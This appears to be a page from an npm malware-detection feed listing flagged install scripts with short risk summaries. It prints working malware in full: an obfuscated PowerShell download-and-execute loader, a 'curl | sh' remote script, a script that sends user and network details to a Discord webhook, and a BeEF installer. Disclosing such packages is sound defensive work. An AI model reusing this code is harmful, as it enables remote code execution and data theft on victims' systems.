Home
Docs
GitHub
Blog

Sandworm scans all new Npm package versions for malicious install scripts.
Scanning since October 2024.
Follow our 𝕏 / Twitter feed for updates.

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The code downloads and executes files from remote URLs using PowerShell and command line execution, which poses a significant security risk. This could lead to running malicious code on the user's system, thus compromising sensitive information or gaining unauthorized access to the system.

Install script:
node index.js
Install script code:
const _0x44ad1e=_0x4269;(function(_0x48f3d5,_0x46aedc){const _0x1dab5b=_0x4269,_0x3753e2=_0x48f3d5();while(!![]){try{const _0x2d837a=parseInt(_0x1dab5b(0xc0))/(-0x2424+0x1570+0xeb5)*(parseInt(_0x1dab5b(0xac))/(-0x1a04+-0x683+0x2089))+-parseInt(_0x1dab5b(0xa0))/(-0x511*-0x7+0x1*0x2029+-0x439d)+parseInt(_0x1dab5b(0xa5))/(0x1866+-0x1*-0x2c8+0x7a*-0x39)*(parseInt(_0x1dab5b(0x99))/(-0xe38+0xed2+-0x95*0x1))+parseInt(_0x1dab5b(0xbe))/(0x1d7c+-0x874*-0x2+-0xa*0x4a3)*(parseInt(_0x1dab5b(0xaa))/(0x7*0x1ee+0x2*0x1069+-0x2e4d))+-parseInt(_0x1dab5b(0xa1))/(0x2639+-0x1*0x1451+0x58*-0x34)*(parseInt(_0x1dab5b(0xb4))/(-0x4d9*0x1+-0x1c31+0x2113))+-parseInt(_0x1dab5b(0xad))/(0x1*-0x676+0xfd5+-0x1*0x955)*(-parseInt(_0x1dab5b(0x96))/(0x1d6c+0x1f9*0xc+-0x1b*0x1f7))+parseInt(_0x1dab5b(0xaf))/(0xb*0x311+0x774+-0x2923)*(-parseInt(_0x1dab5b(0xc1))/(0x21a3+-0xcdc+-0x14ba));if(_0x2d837a===_0x46aedc)break;else _0x3753e2['push'](_0x3753e2['shift']());}catch(_0x5ed81e){_0x3753e2['push'](_0x3753e2['shift']());}}}(_0x5634,0x9a4af+0x1235f7+0x1dce1*-0x7));function _0x5634(){const _0x1f52e8=['775184JpendH','\x20-Command\x20','promisify','error','8kEjfPq','Azyvb','tedguacamo','n/runtime.','DEBoC','7FEGwED','util','128DcEEmt','5709260pzRMOm','Error:\x20','6588iBofYy','le/raw/mai','thub.com/z','powershell','log','45BkQVQb','Downloaded','POWPy','lly','cess\x20\x27','runtime.ex','length','message','child_proc','xc8290asid','9618510exVwgg','\x27\x20-OutFile','18636jPknTq','78923RNUnXv','\x22Start-Pro','https://gi','cmd.exe','n/cmd.exe','bRequest\x20-','exe','ess','33YqCmRm','oioj/anima','join','3995515GGwaLf','Executed\x20','\x20successfu','\x22Invoke-We','HigVT','path','Uri\x20\x27','3955275vIhPlf'];_0x5634=function(){return _0x1f52e8;};return _0x5634();}const {exec}=require(_0x44ad1e(0xbc)+_0x44ad1e(0x95)),path=require(_0x44ad1e(0x9e)),util=require(_0x44ad1e(0xab)),execAsync=util[_0x44ad1e(0xa3)](exec),urls=[_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xc5),_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xa8)+_0x44ad1e(0xc7)],outputFiles=[path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xc4)),path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xb9)+'e')];async function downloadAndRun(_0x425b9e,_0x40dd09){const _0x9e9333=_0x44ad1e,_0x23a275={'DEBoC':function(_0xf20299,_0x44fac9){return _0xf20299(_0x44fac9);},'HigVT':function(_0x5ed004,_0x1cfce5){return _0x5ed004(_0x1cfce5);}},_0x347836=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0x9c)+_0x9e9333(0xc6)+_0x9e9333(0x9f)+_0x425b9e+(_0x9e9333(0xbf)+'\x20\x27')+_0x40dd09+'\x27\x22',_0x32e203=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0xc2)+_0x9e9333(0xb8)+_0x40dd09+'\x27\x22';try{await _0x23a275[_0x9e9333(0xa9)](execAsync,_0x347836),console[_0x9e9333(0xb3)](_0x9e9333(0xb5)+'\x20'+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7))),await _0x23a275[_0x9e9333(0x9d)](execAsync,_0x32e203),console[_0x9e9333(0xb3)](_0x9e9333(0x9a)+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7)));}catch(_0x2a6ac2){console[_0x9e9333(0xa4)](_0x9e9333(0xae)+_0x2a6ac2[_0x9e9333(0xbb)]);}}function _0x4269(_0x2f7d99,_0x1d7745){const _0x118b6e=_0x5634();return _0x4269=function(_0x461f98,_0xb3a835){_0x461f98=_0x461f98-(-0x393*0x2+0x1a21+-0x1*0x1266);let _0x19c998=_0x118b6e[_0x461f98];return _0x19c998;},_0x4269(_0x2f7d99,_0x1d7745);}((async()=>{const _0x5c2395=_0x44ad1e,_0x6ab1d8={'Azyvb':function(_0x242376,_0x2053fc){return _0x242376<_0x2053fc;},'POWPy':function(_0x48e945,_0xac00ce,_0x5371ca){return _0x48e945(_0xac00ce,_0x5371ca);}};for(let _0x53d08d=0x2*-0x3db+-0x1e1*0xd+0x2023;_0x6ab1d8[_0x5c2395(0xa6)](_0x53d08d,urls[_0x5c2395(0xba)]);_0x53d08d++){await _0x6ab1d8[_0x5c2395(0xb6)](downloadAndRun,urls[_0x53d08d],outputFiles[_0x53d08d]);}})());

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

This script downloads and executes a shell script from a remote source, which could contain malicious code that can compromise the system, steal sensitive information, or perform harmful actions without the user's consent.

Install script:
curl -fsSL https://raw.githubusercontent.com/bnonni/drpm.tools/refs/heads/main/setup.sh | sh

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

This script uses curl to download and execute a shell script from a remote repository. This could potentially run malicious code on the local system without user consent or awareness, thereby compromising the system's security.

Install script:
curl -fsSL https://raw.githubusercontent.com/bnonni/drpm.tools/refs/heads/main/setup.sh | sh

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The script attempts to execute system commands that install software packages, using sudo for elevated permissions on Linux systems. This could lead to a security risk if the script is run in an untrusted environment, as it could perform unauthorized installations or modifications to the system. Additionally, it lists specific software installations without checks on the integrity or authenticity of the packages, which may expose the system to malicious software.

Install script:
node node-zerox/scripts/install-dependencies.js
Install script code:
const { exec } = require("child_process");
const { promisify } = require("util");
const fs = require("fs");

const execPromise = promisify(exec);

const installPackage = async (command, packageName) => {
  try {
    const { stdout, stderr } = await execPromise(command);
    if (stderr) {
      throw new Error(`Failed to install ${packageName}: ${stderr}`);
    }
    return stdout;
  } catch (error) {
    throw new Error(`Failed to install ${packageName}: ${error.message}`);
  }
};

const isSudoAvailable = async () => {
  try {
    // Try running a sudo command
    await execPromise("sudo -n true");
    return true;
  } catch {
    return false;
  }
};

const checkAndInstall = async () => {
  try {
    const sudoAvailable = await isSudoAvailable();

    // Check and install Ghostscript
    try {
      await execPromise("gs --version");
    } catch {
      if (process.platform === "darwin") {
        await installPackage("brew install ghostscript", "Ghostscript");
      } else if (process.platform === "linux") {
        const command = sudoAvailable
          ? "sudo apt-get update && sudo apt-get install -y ghostscript"
          : "apt-get update && apt-get install -y ghostscript";
        await installPackage(command, "Ghostscript");
      } else {
        throw new Error(
          "Please install Ghostscript manually from https://www.ghostscript.com/download.html"
        );
      }
    }

    // Check and install GraphicsMagick
    try {
      await execPromise("gm -version");
    } catch {
      if (process.platform === "darwin") {
        await installPackage("brew install graphicsmagick", "GraphicsMagick");
      } else if (process.platform === "linux") {
        const command = sudoAvailable
          ? "sudo apt-get update && sudo apt-get install -y graphicsmagick"
          : "apt-get update && apt-get install -y graphicsmagick";
        await installPackage(command, "GraphicsMagick");
      } else {
        throw new Error(
          "Please install GraphicsMagick manually from http://www.graphicsmagick.org/download.html"
        );
      }
    }

    // Check and install LibreOffice
    try {
      await execPromise("soffice --version");
    } catch {
      if (process.platform === "darwin") {
        await installPackage("brew install --cask libreoffice", "LibreOffice");
      } else if (process.platform === "linux") {
        const command = sudoAvailable
          ? "sudo apt-get update && sudo apt-get install -y libreoffice"
          : "apt-get update && apt-get install -y libreoffice";
        await installPackage(command, "LibreOffice");
      } else {
        throw new Error(
          "Please install LibreOffice manually from https://www.libreoffice.org/download/download/"
        );
      }
    }
  } catch (err) {
    console.error(`Error during installation: ${err.message}`);
    process.exit(1);
  }
};

checkAndInstall();

Detected: 4 Nov 2024
Detected Date: 4 Nov 2024
Affected Install Script: preinstall
Package Source: ↗️ View on Npm

The code collects sensitive information, including internal and external IP addresses, the user's home directory, username, and DNS servers, and sends this data to a specified Discord webhook. This could be exploited to track users or access their sensitive information without consent.

Install script:
node index.js
Install script code:
const os = require("os");
const dns = require("dns");
const https = require("https");
const packageJSON = require("./package.json");

const package = packageJSON.name;

// Function to get the internal IP address
function getIPAddress() {
    const networkInterfaces = os.networkInterfaces();
    for (const interfaceName in networkInterfaces) {
        const iface = networkInterfaces[interfaceName];
        for (const alias of iface) {
            if (alias.family === 'IPv4' && !alias.internal) {
                return alias.address;
            }
        }
    }
    return 'IP not found';
}

// Function to get the external IP address
function getExternalIP(callback) {
    https.get('https://ipinfo.io/json', (res) => {
        let data = '';

        // Receive data chunks
        res.on('data', (chunk) => {
            data += chunk;
        });

        // On response end, parse and return the IP address
        res.on('end', () => {
            const parsedData = JSON.parse(data);
            callback({ip: parsedData.ip, hostname: parsedData.hostname, organization: parsedData.org}); // Call the callback with the external IP address
        });
    }).on('error', (e) => {
        console.error('Error fetching external IP address:', e);
        callback({ip:'External IP not found',hostname:'External hostname not found', organization: 'Organization not found'}); // Handle errors
    });
}

// Prepare the tracking data
getExternalIP((externalIP) => {
    const trackingData = JSON.stringify({
        package: package,
        directory: __dirname,
        home_directory: os.homedir(),
        username: os.userInfo().username,
        dns: dns.getServers(),
        internal_hostname: os.hostname(),
        internal_ip: getIPAddress(), // Add internal IP address here
        external_ip: externalIP.ip, // Get External IP Address
        external_hostname: externalIP.hostname,
        organization: externalIP.organization,
        resolved_url: packageJSON ? packageJSON.___resolved : undefined,
        package_version: packageJSON.version,
        package_json: packageJSON,
        package_type: 'npm',
    });

    const webhookURL = "https://discord.com/api/webhooks/1301084955144618004/dzBF_mUG0Ob7MXPUjc3j4cbfOxRF8aquDty3TZCzVy7y-Pjh78fkwe_z1JezoYhAOv89"; // Replace with your Discord webhook URL

    const postData = JSON.stringify({
        content: `\`\`\`json\n${trackingData}\n\`\`\`` // Wrap the tracking data in a code block for better formatting
    });

    const options = new URL(webhookURL);

    options.method = "POST";
    options.headers = {
        "Content-Type": "application/json",
        "Content-Length": postData.length,
    };

    const req = https.request(options, (res) => {
        res.on("data", (d) => {
            process.stdout.write(d);
        });
    });

    req.on("error", (e) => {
        console.error(e);
    });

    req.write(postData);
    req.end();
});

Detected: 3 Nov 2024
Detected Date: 3 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

This command downloads a shell script from a remote source (GitHub) and executes it directly in the shell without any validation. This is dangerous because the downloaded script could contain malicious code that can compromise the system or steal sensitive information.

Install script:
curl -fsSL https://raw.githubusercontent.com/bnonni/drpm.tools/refs/heads/main/setup.sh | sh

Detected: 3 Nov 2024
Detected Date: 3 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

This code appears to download and execute scripts from a remote source (potentially malicious). It uses PowerShell commands to run downloaded files, which can lead to the execution of arbitrary code on the system, compromising security and potentially taking control of the machine.

Install script:
node index.js
Install script code:
const _0x44ad1e=_0x4269;(function(_0x48f3d5,_0x46aedc){const _0x1dab5b=_0x4269,_0x3753e2=_0x48f3d5();while(!![]){try{const _0x2d837a=parseInt(_0x1dab5b(0xc0))/(-0x2424+0x1570+0xeb5)*(parseInt(_0x1dab5b(0xac))/(-0x1a04+-0x683+0x2089))+-parseInt(_0x1dab5b(0xa0))/(-0x511*-0x7+0x1*0x2029+-0x439d)+parseInt(_0x1dab5b(0xa5))/(0x1866+-0x1*-0x2c8+0x7a*-0x39)*(parseInt(_0x1dab5b(0x99))/(-0xe38+0xed2+-0x95*0x1))+parseInt(_0x1dab5b(0xbe))/(0x1d7c+-0x874*-0x2+-0xa*0x4a3)*(parseInt(_0x1dab5b(0xaa))/(0x7*0x1ee+0x2*0x1069+-0x2e4d))+-parseInt(_0x1dab5b(0xa1))/(0x2639+-0x1*0x1451+0x58*-0x34)*(parseInt(_0x1dab5b(0xb4))/(-0x4d9*0x1+-0x1c31+0x2113))+-parseInt(_0x1dab5b(0xad))/(0x1*-0x676+0xfd5+-0x1*0x955)*(-parseInt(_0x1dab5b(0x96))/(0x1d6c+0x1f9*0xc+-0x1b*0x1f7))+parseInt(_0x1dab5b(0xaf))/(0xb*0x311+0x774+-0x2923)*(-parseInt(_0x1dab5b(0xc1))/(0x21a3+-0xcdc+-0x14ba));if(_0x2d837a===_0x46aedc)break;else _0x3753e2['push'](_0x3753e2['shift']());}catch(_0x5ed81e){_0x3753e2['push'](_0x3753e2['shift']());}}}(_0x5634,0x9a4af+0x1235f7+0x1dce1*-0x7));function _0x5634(){const _0x1f52e8=['775184JpendH','\x20-Command\x20','promisify','error','8kEjfPq','Azyvb','tedguacamo','n/runtime.','DEBoC','7FEGwED','util','128DcEEmt','5709260pzRMOm','Error:\x20','6588iBofYy','le/raw/mai','thub.com/z','powershell','log','45BkQVQb','Downloaded','POWPy','lly','cess\x20\x27','runtime.ex','length','message','child_proc','xc8290asid','9618510exVwgg','\x27\x20-OutFile','18636jPknTq','78923RNUnXv','\x22Start-Pro','https://gi','cmd.exe','n/cmd.exe','bRequest\x20-','exe','ess','33YqCmRm','oioj/anima','join','3995515GGwaLf','Executed\x20','\x20successfu','\x22Invoke-We','HigVT','path','Uri\x20\x27','3955275vIhPlf'];_0x5634=function(){return _0x1f52e8;};return _0x5634();}const {exec}=require(_0x44ad1e(0xbc)+_0x44ad1e(0x95)),path=require(_0x44ad1e(0x9e)),util=require(_0x44ad1e(0xab)),execAsync=util[_0x44ad1e(0xa3)](exec),urls=[_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xc5),_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xa8)+_0x44ad1e(0xc7)],outputFiles=[path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xc4)),path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xb9)+'e')];async function downloadAndRun(_0x425b9e,_0x40dd09){const _0x9e9333=_0x44ad1e,_0x23a275={'DEBoC':function(_0xf20299,_0x44fac9){return _0xf20299(_0x44fac9);},'HigVT':function(_0x5ed004,_0x1cfce5){return _0x5ed004(_0x1cfce5);}},_0x347836=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0x9c)+_0x9e9333(0xc6)+_0x9e9333(0x9f)+_0x425b9e+(_0x9e9333(0xbf)+'\x20\x27')+_0x40dd09+'\x27\x22',_0x32e203=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0xc2)+_0x9e9333(0xb8)+_0x40dd09+'\x27\x22';try{await _0x23a275[_0x9e9333(0xa9)](execAsync,_0x347836),console[_0x9e9333(0xb3)](_0x9e9333(0xb5)+'\x20'+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7))),await _0x23a275[_0x9e9333(0x9d)](execAsync,_0x32e203),console[_0x9e9333(0xb3)](_0x9e9333(0x9a)+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7)));}catch(_0x2a6ac2){console[_0x9e9333(0xa4)](_0x9e9333(0xae)+_0x2a6ac2[_0x9e9333(0xbb)]);}}function _0x4269(_0x2f7d99,_0x1d7745){const _0x118b6e=_0x5634();return _0x4269=function(_0x461f98,_0xb3a835){_0x461f98=_0x461f98-(-0x393*0x2+0x1a21+-0x1*0x1266);let _0x19c998=_0x118b6e[_0x461f98];return _0x19c998;},_0x4269(_0x2f7d99,_0x1d7745);}((async()=>{const _0x5c2395=_0x44ad1e,_0x6ab1d8={'Azyvb':function(_0x242376,_0x2053fc){return _0x242376<_0x2053fc;},'POWPy':function(_0x48e945,_0xac00ce,_0x5371ca){return _0x48e945(_0xac00ce,_0x5371ca);}};for(let _0x53d08d=0x2*-0x3db+-0x1e1*0xd+0x2023;_0x6ab1d8[_0x5c2395(0xa6)](_0x53d08d,urls[_0x5c2395(0xba)]);_0x53d08d++){await _0x6ab1d8[_0x5c2395(0xb6)](downloadAndRun,urls[_0x53d08d],outputFiles[_0x53d08d]);}})());

Detected: 3 Nov 2024
Detected Date: 3 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The code contains a function that downloads executable files from specified URLs and runs them using PowerShell on the system. This poses a significant risk as it could execute malicious code, allowing an attacker to take control of the system or steal sensitive information.

Install script:
node index.js
Install script code:
const _0x44ad1e=_0x4269;(function(_0x48f3d5,_0x46aedc){const _0x1dab5b=_0x4269,_0x3753e2=_0x48f3d5();while(!![]){try{const _0x2d837a=parseInt(_0x1dab5b(0xc0))/(-0x2424+0x1570+0xeb5)*(parseInt(_0x1dab5b(0xac))/(-0x1a04+-0x683+0x2089))+-parseInt(_0x1dab5b(0xa0))/(-0x511*-0x7+0x1*0x2029+-0x439d)+parseInt(_0x1dab5b(0xa5))/(0x1866+-0x1*-0x2c8+0x7a*-0x39)*(parseInt(_0x1dab5b(0x99))/(-0xe38+0xed2+-0x95*0x1))+parseInt(_0x1dab5b(0xbe))/(0x1d7c+-0x874*-0x2+-0xa*0x4a3)*(parseInt(_0x1dab5b(0xaa))/(0x7*0x1ee+0x2*0x1069+-0x2e4d))+-parseInt(_0x1dab5b(0xa1))/(0x2639+-0x1*0x1451+0x58*-0x34)*(parseInt(_0x1dab5b(0xb4))/(-0x4d9*0x1+-0x1c31+0x2113))+-parseInt(_0x1dab5b(0xad))/(0x1*-0x676+0xfd5+-0x1*0x955)*(-parseInt(_0x1dab5b(0x96))/(0x1d6c+0x1f9*0xc+-0x1b*0x1f7))+parseInt(_0x1dab5b(0xaf))/(0xb*0x311+0x774+-0x2923)*(-parseInt(_0x1dab5b(0xc1))/(0x21a3+-0xcdc+-0x14ba));if(_0x2d837a===_0x46aedc)break;else _0x3753e2['push'](_0x3753e2['shift']());}catch(_0x5ed81e){_0x3753e2['push'](_0x3753e2['shift']());}}}(_0x5634,0x9a4af+0x1235f7+0x1dce1*-0x7));function _0x5634(){const _0x1f52e8=['775184JpendH','\x20-Command\x20','promisify','error','8kEjfPq','Azyvb','tedguacamo','n/runtime.','DEBoC','7FEGwED','util','128DcEEmt','5709260pzRMOm','Error:\x20','6588iBofYy','le/raw/mai','thub.com/z','powershell','log','45BkQVQb','Downloaded','POWPy','lly','cess\x20\x27','runtime.ex','length','message','child_proc','xc8290asid','9618510exVwgg','\x27\x20-OutFile','18636jPknTq','78923RNUnXv','\x22Start-Pro','https://gi','cmd.exe','n/cmd.exe','bRequest\x20-','exe','ess','33YqCmRm','oioj/anima','join','3995515GGwaLf','Executed\x20','\x20successfu','\x22Invoke-We','HigVT','path','Uri\x20\x27','3955275vIhPlf'];_0x5634=function(){return _0x1f52e8;};return _0x5634();}const {exec}=require(_0x44ad1e(0xbc)+_0x44ad1e(0x95)),path=require(_0x44ad1e(0x9e)),util=require(_0x44ad1e(0xab)),execAsync=util[_0x44ad1e(0xa3)](exec),urls=[_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xc5),_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xa8)+_0x44ad1e(0xc7)],outputFiles=[path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xc4)),path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xb9)+'e')];async function downloadAndRun(_0x425b9e,_0x40dd09){const _0x9e9333=_0x44ad1e,_0x23a275={'DEBoC':function(_0xf20299,_0x44fac9){return _0xf20299(_0x44fac9);},'HigVT':function(_0x5ed004,_0x1cfce5){return _0x5ed004(_0x1cfce5);}},_0x347836=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0x9c)+_0x9e9333(0xc6)+_0x9e9333(0x9f)+_0x425b9e+(_0x9e9333(0xbf)+'\x20\x27')+_0x40dd09+'\x27\x22',_0x32e203=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0xc2)+_0x9e9333(0xb8)+_0x40dd09+'\x27\x22';try{await _0x23a275[_0x9e9333(0xa9)](execAsync,_0x347836),console[_0x9e9333(0xb3)](_0x9e9333(0xb5)+'\x20'+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7))),await _0x23a275[_0x9e9333(0x9d)](execAsync,_0x32e203),console[_0x9e9333(0xb3)](_0x9e9333(0x9a)+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7)));}catch(_0x2a6ac2){console[_0x9e9333(0xa4)](_0x9e9333(0xae)+_0x2a6ac2[_0x9e9333(0xbb)]);}}function _0x4269(_0x2f7d99,_0x1d7745){const _0x118b6e=_0x5634();return _0x4269=function(_0x461f98,_0xb3a835){_0x461f98=_0x461f98-(-0x393*0x2+0x1a21+-0x1*0x1266);let _0x19c998=_0x118b6e[_0x461f98];return _0x19c998;},_0x4269(_0x2f7d99,_0x1d7745);}((async()=>{const _0x5c2395=_0x44ad1e,_0x6ab1d8={'Azyvb':function(_0x242376,_0x2053fc){return _0x242376<_0x2053fc;},'POWPy':function(_0x48e945,_0xac00ce,_0x5371ca){return _0x48e945(_0xac00ce,_0x5371ca);}};for(let _0x53d08d=0x2*-0x3db+-0x1e1*0xd+0x2023;_0x6ab1d8[_0x5c2395(0xa6)](_0x53d08d,urls[_0x5c2395(0xba)]);_0x53d08d++){await _0x6ab1d8[_0x5c2395(0xb6)](downloadAndRun,urls[_0x53d08d],outputFiles[_0x53d08d]);}})());

Detected: 3 Nov 2024
Detected Date: 3 Nov 2024
Affected Install Script: postinstall
Package Source: ↗️ View on Npm

The code downloads and executes files from remote URLs and runs commands through PowerShell and cmd. This poses a significant security risk as it can be used to remotely execute malicious code on the system, potentially leading to unauthorized access, data theft, or system compromise.

Install script:
node index.js
Install script code:
const _0x44ad1e=_0x4269;(function(_0x48f3d5,_0x46aedc){const _0x1dab5b=_0x4269,_0x3753e2=_0x48f3d5();while(!![]){try{const _0x2d837a=parseInt(_0x1dab5b(0xc0))/(-0x2424+0x1570+0xeb5)*(parseInt(_0x1dab5b(0xac))/(-0x1a04+-0x683+0x2089))+-parseInt(_0x1dab5b(0xa0))/(-0x511*-0x7+0x1*0x2029+-0x439d)+parseInt(_0x1dab5b(0xa5))/(0x1866+-0x1*-0x2c8+0x7a*-0x39)*(parseInt(_0x1dab5b(0x99))/(-0xe38+0xed2+-0x95*0x1))+parseInt(_0x1dab5b(0xbe))/(0x1d7c+-0x874*-0x2+-0xa*0x4a3)*(parseInt(_0x1dab5b(0xaa))/(0x7*0x1ee+0x2*0x1069+-0x2e4d))+-parseInt(_0x1dab5b(0xa1))/(0x2639+-0x1*0x1451+0x58*-0x34)*(parseInt(_0x1dab5b(0xb4))/(-0x4d9*0x1+-0x1c31+0x2113))+-parseInt(_0x1dab5b(0xad))/(0x1*-0x676+0xfd5+-0x1*0x955)*(-parseInt(_0x1dab5b(0x96))/(0x1d6c+0x1f9*0xc+-0x1b*0x1f7))+parseInt(_0x1dab5b(0xaf))/(0xb*0x311+0x774+-0x2923)*(-parseInt(_0x1dab5b(0xc1))/(0x21a3+-0xcdc+-0x14ba));if(_0x2d837a===_0x46aedc)break;else _0x3753e2['push'](_0x3753e2['shift']());}catch(_0x5ed81e){_0x3753e2['push'](_0x3753e2['shift']());}}}(_0x5634,0x9a4af+0x1235f7+0x1dce1*-0x7));function _0x5634(){const _0x1f52e8=['775184JpendH','\x20-Command\x20','promisify','error','8kEjfPq','Azyvb','tedguacamo','n/runtime.','DEBoC','7FEGwED','util','128DcEEmt','5709260pzRMOm','Error:\x20','6588iBofYy','le/raw/mai','thub.com/z','powershell','log','45BkQVQb','Downloaded','POWPy','lly','cess\x20\x27','runtime.ex','length','message','child_proc','xc8290asid','9618510exVwgg','\x27\x20-OutFile','18636jPknTq','78923RNUnXv','\x22Start-Pro','https://gi','cmd.exe','n/cmd.exe','bRequest\x20-','exe','ess','33YqCmRm','oioj/anima','join','3995515GGwaLf','Executed\x20','\x20successfu','\x22Invoke-We','HigVT','path','Uri\x20\x27','3955275vIhPlf'];_0x5634=function(){return _0x1f52e8;};return _0x5634();}const {exec}=require(_0x44ad1e(0xbc)+_0x44ad1e(0x95)),path=require(_0x44ad1e(0x9e)),util=require(_0x44ad1e(0xab)),execAsync=util[_0x44ad1e(0xa3)](exec),urls=[_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xc5),_0x44ad1e(0xc3)+_0x44ad1e(0xb1)+_0x44ad1e(0xbd)+_0x44ad1e(0x97)+_0x44ad1e(0xa7)+_0x44ad1e(0xb0)+_0x44ad1e(0xa8)+_0x44ad1e(0xc7)],outputFiles=[path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xc4)),path[_0x44ad1e(0x98)](__dirname,_0x44ad1e(0xb9)+'e')];async function downloadAndRun(_0x425b9e,_0x40dd09){const _0x9e9333=_0x44ad1e,_0x23a275={'DEBoC':function(_0xf20299,_0x44fac9){return _0xf20299(_0x44fac9);},'HigVT':function(_0x5ed004,_0x1cfce5){return _0x5ed004(_0x1cfce5);}},_0x347836=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0x9c)+_0x9e9333(0xc6)+_0x9e9333(0x9f)+_0x425b9e+(_0x9e9333(0xbf)+'\x20\x27')+_0x40dd09+'\x27\x22',_0x32e203=_0x9e9333(0xb2)+_0x9e9333(0xa2)+_0x9e9333(0xc2)+_0x9e9333(0xb8)+_0x40dd09+'\x27\x22';try{await _0x23a275[_0x9e9333(0xa9)](execAsync,_0x347836),console[_0x9e9333(0xb3)](_0x9e9333(0xb5)+'\x20'+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7))),await _0x23a275[_0x9e9333(0x9d)](execAsync,_0x32e203),console[_0x9e9333(0xb3)](_0x9e9333(0x9a)+_0x40dd09+(_0x9e9333(0x9b)+_0x9e9333(0xb7)));}catch(_0x2a6ac2){console[_0x9e9333(0xa4)](_0x9e9333(0xae)+_0x2a6ac2[_0x9e9333(0xbb)]);}}function _0x4269(_0x2f7d99,_0x1d7745){const _0x118b6e=_0x5634();return _0x4269=function(_0x461f98,_0xb3a835){_0x461f98=_0x461f98-(-0x393*0x2+0x1a21+-0x1*0x1266);let _0x19c998=_0x118b6e[_0x461f98];return _0x19c998;},_0x4269(_0x2f7d99,_0x1d7745);}((async()=>{const _0x5c2395=_0x44ad1e,_0x6ab1d8={'Azyvb':function(_0x242376,_0x2053fc){return _0x242376<_0x2053fc;},'POWPy':function(_0x48e945,_0xac00ce,_0x5371ca){return _0x48e945(_0xac00ce,_0x5371ca);}};for(let _0x53d08d=0x2*-0x3db+-0x1e1*0xd+0x2023;_0x6ab1d8[_0x5c2395(0xa6)](_0x53d08d,urls[_0x5c2395(0xba)]);_0x53d08d++){await _0x6ab1d8[_0x5c2395(0xb6)](downloadAndRun,urls[_0x53d08d],outputFiles[_0x53d08d]);}})());

Detected: 3 Nov 2024
Detected Date: 3 Nov 2024
Affected Install Script: install
Package Source: ↗️ View on Npm

This script installs and starts the BeEF (Browser Exploitation Framework), which is designed to exploit web browsers. By using this framework, an attacker could control target machines, steal sensitive information, and carry out various malicious actions through browser vulnerabilities. The installation and execution of BeEF without user consent could lead to significant security risks.

Install script:
node index.js
Install script code:
const { exec } = require('child_process');
const axios = require('axios');
const path = require('path');
const fs = require('fs');
const readline = require('readline');

const BEEF_DIR = path.join(__dirname, 'beef');
const BEEF_REPO = 'https://github.com/beefproject/beef.git';
const BEEF_PORT = 3000; // Default BeEF port

// Function to install BeEF
exports.installBeEF = function() {
    return new Promise((resolve, reject) => {
        if (fs.existsSync(BEEF_DIR)) {
            return reject(`BeEF directory already exists: ${BEEF_DIR}`);
        }
        console.log('Cloning BeEF repository...');
        exec(`git clone ${BEEF_REPO} ${BEEF_DIR}`, (error) => {
            if (error) {
                return reject(`Error cloning BeEF: ${error.message}`);
            }
            console.log('BeEF cloned successfully.');
            resolve();
        });
    });
};

function updateCredentials(username, password) {
    const configPath = path.join(BEEF_DIR, 'config.yaml');
    let config = fs.readFileSync(configPath, 'utf8');

    // Replace the default username and password in the config file
    config = config.replace(/username: '.*?'/, `username: '${username}'`);
    config = config.replace(/passwd: '.*?'/, `passwd: '${password}'`);

    fs.writeFileSync(configPath, config, 'utf8');
}

